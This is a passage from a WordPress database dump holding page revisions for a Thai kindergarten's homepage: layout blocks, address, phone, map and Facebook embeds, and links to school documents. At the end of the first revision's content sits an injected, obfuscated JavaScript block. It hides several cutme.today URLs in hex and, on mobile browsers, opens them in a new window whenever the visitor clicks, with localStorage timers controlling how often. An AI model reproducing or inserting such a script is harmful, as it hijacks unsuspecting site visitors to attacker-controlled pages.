2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-30 09:52:24','2024-08-30 02:52:24','',19,'http://watprato.ssk.in.th/?p=290',0,'revision','',0);
INSERT INTO `wp_posts` VALUES
(291,2,'2024-08-30 09:54:36','2024-08-30 02:54:36','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid 